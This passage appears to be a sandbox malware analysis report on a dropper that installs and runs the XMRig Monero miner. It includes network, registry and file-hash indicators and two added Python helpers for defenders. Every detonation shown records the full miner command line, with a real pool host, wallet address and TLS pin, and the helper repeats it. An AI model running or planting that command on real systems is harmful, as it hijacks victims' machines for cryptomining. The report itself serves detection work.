memory/1576-74-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-75-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-76-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-77-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-78-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-79-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-80-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-81-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-82-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-83-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-84-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:38
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1789s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (binary certificate blob, elided) | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (binary certificate blob, elided) | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
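The value written under that key is CryptoAPI's serialized certificate context: a run of property records, each laid out as `<u32 property id><u32 reserved = 1><u32 length><data>`, with the DER certificate itself carried as property 32. Decoding the copy of this blob that the behavioral3 analysis on this page prints in full gives a friendly name of `Sectigo (AAA)` and a subject of `AAA Certificate Services` (Comodo CA Limited, valid 2004-01-01 to 2028-12-31); the key name `D1EB23A46D17D68FD92564C2F1F1601764D8E349` is that certificate's SHA-1 thumbprint. `AuthRoot\Certificates` is the cache that Windows' automatic root certificate update fills, in the calling process, when chain building needs a root that is not yet on the machine. That is why the write is attributed to `main - Copy.exe`, which is talking HTTPS to github.com and objects.githubusercontent.com at the time, and why this signature on its own is not evidence of a planted root. The check that separates the two cases is whether the key name, the stored CERT_SHA1_HASH property and the SHA-1 of the embedded certificate all agree (and whether that thumbprint is a root-program member). The parser below is an added example, not sandbox or Microsoft code; the blob it parses is constructed with the real record layout but placeholder certificate bytes, because the page's own blob is cut off.

```python
"""Decode a SystemCertificates\\...\\Certificates\\<thumbprint>\\Blob value and
check that the key name really is the SHA-1 of the certificate it carries.
Added forensic example; not code from the sandbox."""
import hashlib
import struct
from typing import Dict, List, Tuple

# CryptoAPI property IDs (wincrypt.h CERT_*_PROP_ID) seen in AuthRoot blobs.
PROP_NAMES = {
    3: "CERT_SHA1_HASH", 4: "CERT_MD5_HASH", 9: "CERT_ENHKEY_USAGE",
    11: "CERT_FRIENDLY_NAME", 15: "CERT_SIGNATURE_HASH", 20: "CERT_KEY_IDENTIFIER",
    29: "CERT_SUBJECT_NAME_MD5_HASH", 32: "CERT_CERT",
    83: "CERT_ROOT_PROGRAM_CERT_POLICIES", 98: "CERT_AUTH_ROOT_SHA256_HASH",
}


def parse_cert_blob(blob: bytes) -> List[Tuple[int, bytes]]:
    """Split the blob into (property_id, data) records.  Each record is
    <u32 property id><u32 reserved, always 1><u32 length><length bytes>, little-endian."""
    records: List[Tuple[int, bytes]] = []
    off = 0
    while off < len(blob):
        if len(blob) - off < 12:
            raise ValueError(f"truncated record header at offset {off}")
        prop_id, reserved, length = struct.unpack_from("<III", blob, off)
        if reserved != 1:
            raise ValueError(f"unexpected reserved value {reserved} at offset {off + 4}")
        off += 12
        if off + length > len(blob):
            raise ValueError(f"property {prop_id} runs {off + length - len(blob)} bytes past the end")
        records.append((prop_id, blob[off:off + length]))
        off += length
    return records


def build_cert_blob(records: List[Tuple[int, bytes]]) -> bytes:
    """Inverse of parse_cert_blob; used here only to construct the sample."""
    return b"".join(struct.pack("<III", pid, 1, len(data)) + data for pid, data in records)


def summarize_cert_blob(blob: bytes, key_name: str) -> Dict[str, object]:
    """Extract the fields an analyst needs and verify the thumbprint chain:
    registry key name == stored CERT_SHA1_HASH == SHA-1 of the DER certificate."""
    records = parse_cert_blob(blob)
    props = dict(records)
    cert_der = props.get(32, b"")
    computed_sha1 = hashlib.sha1(cert_der).hexdigest().upper() if cert_der else ""
    stored_sha1 = props.get(3, b"").hex().upper()
    friendly = props.get(11, b"").decode("utf-16-le", errors="replace").rstrip("\x00")
    return {
        "properties": [PROP_NAMES.get(pid, f"PROP_{pid}") for pid, _ in records],
        "friendly_name": friendly,
        "stored_sha1": stored_sha1,
        "computed_sha1": computed_sha1,
        "cert_der_len": len(cert_der),
        # False means the key name does not describe the certificate stored under it:
        # treat that as a planted certificate rather than an AuthRoot cache entry.
        "thumbprint_matches_key": bool(cert_der) and computed_sha1 == stored_sha1 == key_name.upper(),
    }


# Constructed sample: the friendly name matches the blob on this page, but the
# certificate bytes are a placeholder, not a real DER certificate.
FAKE_CERT_DER = b"\x30\x82\x01\x04" + bytes(range(256)) + b"\x00" * 4
SAMPLE_KEY_NAME = hashlib.sha1(FAKE_CERT_DER).hexdigest().upper()
SAMPLE_BLOB = build_cert_blob([
    (11, "Sectigo (AAA)\x00".encode("utf-16-le")),
    (3, bytes.fromhex(SAMPLE_KEY_NAME)),
    (32, FAKE_CERT_DER),
])

if __name__ == "__main__":
    for k, v in summarize_cert_blob(SAMPLE_BLOB, SAMPLE_KEY_NAME).items():
        print(f"{k}: {v}")
```

To run it against a live system, export the `Blob` value from the key above (for example with `reg.exe export` or a registry hive parser), pass the raw bytes and the key name to `summarize_cert_blob`, and then compare the thumbprint with the current Microsoft root program list; a mismatch between key name and certificate, or a certificate that is not a program member, is the finding.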
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3256 wrote to memory of 5080 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3256 wrote to memory of 5080 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 113.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
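The argument string recorded under Processes carries everything the miner needs and, for a defender, everything worth extracting: the pool (`pool.hashvault.pro:80`), the Monero wallet in `--user` (a 95-character base58 mainnet address, the payout identity that links this sample to other drops using it), `--pass T` (worker name), `--donate-level 1`, and `--tls` together with `--tls-fingerprint`, a SHA-256 pin of the pool's TLS certificate. Two details matter for detection: the TLS session runs on port 80 (the network table shows tcp to 95.179.241.203:80), so rules that key on 443 or expect cleartext on 80 miss it, and the pinned certificate hash is an IOC in its own right for sensors that log server certificate hashes. The triage helper below is an added example, not sandbox or XMRig code, that parses the recorded command line, validates the wallet format and correlates the pool host with the network rows; `NETWORK_ROWS` is a constructed subset of the table above, and the option table covers only a subset of XMRig's switches.

```python
"""Pull mining IOCs out of an XMRig command line and correlate them with a
sandbox network table.  Added triage example; not code from the sandbox or
from XMRig."""
import shlex
from typing import Any, Dict, List, Optional, Tuple

# The command line recorded under Processes for the behavioral19 detonation.
XMRIG_CMDLINE = (
    "xmrig-6.21.0\\xmrig.exe --url pool.hashvault.pro:80 "
    "--user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR "
    "--pass T --donate-level 1 --tls "
    "--tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14"
)
# Constructed subset of the Network table rows: (country, destination, domain, proto).
NETWORK_ROWS = [
    ("US", "8.8.8.8:53", "pool.hashvault.pro", "udp"),
    ("DE", "95.179.241.203:80", "pool.hashvault.pro", "tcp"),
    ("GB", "20.26.156.215:443", "github.com", "tcp"),
]

# Subset of XMRig's option table: options that take a value, and bare flags.
VALUE_OPTS = {"-o": "url", "--url": "url", "-u": "user", "--user": "user",
              "-p": "pass", "--pass": "pass", "-a": "algo", "--algo": "algo",
              "--coin": "coin", "-t": "threads", "--threads": "threads",
              "--donate-level": "donate-level", "--tls-fingerprint": "tls-fingerprint",
              "--rig-id": "rig-id"}
FLAG_OPTS = {"--tls": "tls", "-B": "background", "--background": "background",
             "-k": "keepalive", "--keepalive": "keepalive", "--nicehash": "nicehash"}
BASE58 = set("123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz")


def parse_xmrig_args(cmdline: str) -> Dict[str, Any]:
    """Tokenise an XMRig command line into an option dict; accepts both
    '--url host:port' and '--url=host:port'.  Unknown tokens are kept."""
    toks = shlex.split(cmdline, posix=False)   # posix=False keeps Windows backslashes
    opts: Dict[str, Any] = {"exe": toks[0] if toks else "", "unknown": []}
    i = 1
    while i < len(toks):
        name, sep, inline_val = toks[i].partition("=")
        if name in VALUE_OPTS:
            if not sep:                         # value is the next token
                i += 1
                inline_val = toks[i] if i < len(toks) else ""
            opts[VALUE_OPTS[name]] = inline_val
        elif name in FLAG_OPTS:
            opts[FLAG_OPTS[name]] = True
        else:
            opts["unknown"].append(toks[i])
        i += 1
    return opts


def split_host_port(url: str) -> Tuple[str, Optional[int]]:
    """'pool.hashvault.pro:80' or 'stratum+ssl://host:443' -> (host, port)."""
    if "://" in url:
        url = url.split("://", 1)[1]
    host, sep, port = url.rpartition(":")
    if sep and port.isdigit():
        return host.strip("[]"), int(port)
    return url.strip("[]"), None


def looks_like_monero_address(addr: str) -> bool:
    """Mainnet standard/sub address (95 chars) or integrated address (106 chars)."""
    return len(addr) in (95, 106) and addr[0] in "48" and set(addr) <= BASE58


def extract_iocs(cmdline: str, network_rows: List[Tuple[str, str, str, str]]) -> Dict[str, Any]:
    """Parse the command line, then look for the pool in the network rows."""
    opts = parse_xmrig_args(cmdline)
    url = str(opts.get("url", ""))
    host, port = split_host_port(url)
    tls = bool(opts.get("tls")) or url.startswith("stratum+ssl://")
    fp = str(opts.get("tls-fingerprint", "")).lower()
    findings: List[str] = []
    if host:
        findings.append("mining_pool_configured")
    if looks_like_monero_address(str(opts.get("user", ""))):
        findings.append("monero_wallet_in_user_field")
    if tls and port not in (None, 443):
        findings.append("tls_on_nonstandard_port")   # here TLS to :80, so port filters miss it
    if len(fp) == 64 and all(c in "0123456789abcdef" for c in fp):
        findings.append("pool_cert_pinned")          # the pinned SHA-256 is itself a network IOC
    conns = [dst for _c, dst, dom, proto in network_rows if proto == "tcp" and dom == host]
    if conns:
        findings.append("pool_connection_observed")
    return {"pool_host": host, "pool_port": port, "tls": tls, "tls_fingerprint_sha256": fp,
            "wallet": opts.get("user", ""), "donate_level": opts.get("donate-level"),
            "pool_connections": conns, "findings": findings}


if __name__ == "__main__":
    for k, v in extract_iocs(XMRIG_CMDLINE, NETWORK_ROWS).items():
        print(f"{k}: {v}")
```

The `SeLockMemoryPrivilege` rows under AdjustPrivilegeToken in each detonation are XMRig enabling large pages for RandomX; on Windows that call is logged as Security event 4703 (a token right was adjusted) and makes a useful second signal next to the command line, since the miner asks for it even when the binary has been renamed.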
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/5080-16-0x0000018AB2ED0000-0x0000018AB2EF0000-memory.dmp
memory/5080-17-0x0000018AB2F20000-0x0000018AB2F40000-memory.dmp
memory/5080-18-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-20-0x0000018AB2F70000-0x0000018AB2F90000-memory.dmp
memory/5080-19-0x0000018AB2F50000-0x0000018AB2F70000-memory.dmp
memory/5080-21-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-22-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-23-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-25-0x0000018AB2F70000-0x0000018AB2F90000-memory.dmp
memory/5080-24-0x0000018AB2F50000-0x0000018AB2F70000-memory.dmp
memory/5080-26-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-27-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-28-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-29-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-30-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-31-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-32-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-33-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-34-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-35-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-36-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-37-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-38-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-39-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-40-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-41-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-42-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-43-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-44-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-45-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-46-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-47-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-48-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-49-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-50-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-51-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-52-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-53-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-54-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-55-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-56-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-57-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-58-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-59-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-60-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-61-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-62-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-63-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-64-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-65-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-66-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-67-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-68-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-69-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-70-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-71-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-72-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-73-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-74-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-75-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-76-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-77-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-78-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-79-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-80-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-81-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-82-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-83-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
memory/5080-84-0x00007FF61FD60000-0x00007FF620863000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:27
Platform
win10v2004-20240426-en
Max time kernel
1795s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (binary certificate blob, elided) | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (binary certificate blob, elided) | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3288 wrote to memory of 1616 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3288 wrote to memory of 1616 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1616-16-0x0000019DD59B0000-0x0000019DD59D0000-memory.dmp
memory/1616-17-0x0000019DD5C10000-0x0000019DD5C30000-memory.dmp
memory/1616-18-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-19-0x0000019DD5C30000-0x0000019DD5C50000-memory.dmp
memory/1616-20-0x0000019DD7500000-0x0000019DD7520000-memory.dmp
memory/1616-21-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-22-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-25-0x0000019DD7500000-0x0000019DD7520000-memory.dmp
memory/1616-24-0x0000019DD5C30000-0x0000019DD5C50000-memory.dmp
memory/1616-23-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-26-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-27-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-28-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-29-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-30-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-31-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-32-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-33-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-34-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-35-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-36-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-37-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-38-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-39-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-40-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-41-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-42-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-43-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-44-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-45-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-46-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-47-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-48-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-49-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-50-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-51-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-52-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-53-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-54-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-55-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-56-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-57-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-58-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-59-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-60-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-61-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-62-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-63-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-64-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-65-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-66-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-67-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-68-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-69-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-70-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-71-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
memory/1616-72-0x00007FF6C1A80000-0x00007FF6C2583000-memory.dmp
